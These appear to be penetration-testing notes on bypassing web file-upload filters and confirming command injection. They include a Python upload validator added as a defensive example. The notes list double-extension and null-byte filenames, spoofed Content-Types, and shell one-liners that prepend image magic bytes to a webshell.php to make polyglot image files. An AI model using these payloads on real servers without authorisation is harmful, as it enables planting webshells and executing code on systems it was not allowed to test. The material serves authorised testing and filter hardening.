User Endpoints
File Upload Filtering
Executable extensions
.php -> Standard extension for PHP scripts.
.php5 -> Used for PHP version 5 scripts.
.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.
.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.
.phps -> Typically used for PHP source code highlighting.
.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.
.asp -> Active Server Pages, Microsoft's server-side scripting technology.
.aspx -> ASP.NET pages used for dynamic web content on Microsoft platforms.
.jsp -> JavaServer Pages, used for dynamic web applications in Java environments.
Test filters
There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:
File extension:
Double extensions: .png.php, .jpg.php, .png.asp, .gif.jsp
Null byte injection: file.php%00.jpg, file.asp%00.png
Content-Type headers:
Executable types: application/x-php, application/x-sh, application/x-msdownload, application/x-python-code
Image types: image/png, image/jpeg, image/gif, image/bmp, image/svg+xml
MIME confusion: text/html instead of application/json, or text/plain, to trick servers.
Magic bytes (file signature):
Online hex editor ->
echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png
echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg
echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif
echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf
echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip
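A server-side validator, added here as an example (not part of the original notes), that applies the three checks from the defender's side and rejects the bypasses listed above: an executable extension anywhere in the name, %00 or a raw null byte in the name, a Content-Type outside the image allowlist, and a file that carries the right magic bytes but a script body directly after them. The structural checks are minimal header sanity checks, not a full image parser; the sample inputs are constructed.

```python
# Extensions the notes list as server-executable; refuse them in any position
# of the filename, not just the last one (catches shell.png.php).
EXECUTABLE_EXTS = {"php", "php3", "php5", "phtml", "pht", "phps", "asp", "aspx", "jsp"}
# Declared Content-Type -> internal kind, and filename extension -> kind.
ALLOWED_TYPES = {"image/png": "png", "image/jpeg": "jpg", "image/gif": "gif"}
EXT_KIND = {"png": "png", "jpg": "jpg", "jpeg": "jpg", "gif": "gif"}
SIGNATURES = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}

def structurally_plausible(kind, data):
    """Header checks beyond the bare signature, so magic bytes + script text fails."""
    if kind == "png":
        # A real PNG's first chunk is IHDR with a 13-byte payload (length 0x0000000d).
        return data[8:16] == b"\x00\x00\x00\x0dIHDR"
    if kind == "gif":
        # The signature on the page is only "GIF8"; a real file continues with 7a/9a.
        return data[:6] in (b"GIF87a", b"GIF89a")
    if kind == "jpg":
        # The byte after FFD8FF must be a JPEG marker code (APPn, DQT, SOF, ...).
        return len(data) > 3 and 0xC0 <= data[3] <= 0xFE
    return False

def validate_upload(filename, content_type, data):
    """Return (accepted, reason) for one upload: extension, Content-Type, signature."""
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return False, "executable extension in filename"
    kind = ALLOWED_TYPES.get(content_type.split(";")[0].strip().lower())
    if kind is None:
        return False, "content-type not allowed"
    if EXT_KIND.get(parts[-1]) != kind:
        return False, "extension does not match content-type"
    if not data.startswith(SIGNATURES[kind]):
        return False, "magic bytes do not match content-type"
    if not structurally_plausible(kind, data):
        return False, "header is not structurally valid"
    return True, "ok"

# Constructed samples: a minimal real PNG header, and the polyglot built by the
# "cat magic_bytes.bin webshell.php > malicious.png" trick (signature + script).
GOOD_PNG = SIGNATURES["png"] + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
POLYGLOT_PNG = SIGNATURES["png"] + b"<?php echo 'x'; ?>"
```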
Check Input Sanitation/Validation
Submit special characters in the request -> !@$%^&
In Linux, IP addresses can be written in decimal and hex; this can be useful if dots are blacklisted.
Prove the Injection
If you find a command injection, test whether the system can establish outbound connections to an external server:
ping+10.10.10.10
And wait for it with tcpdump:
tcpdump -i tun0 icmp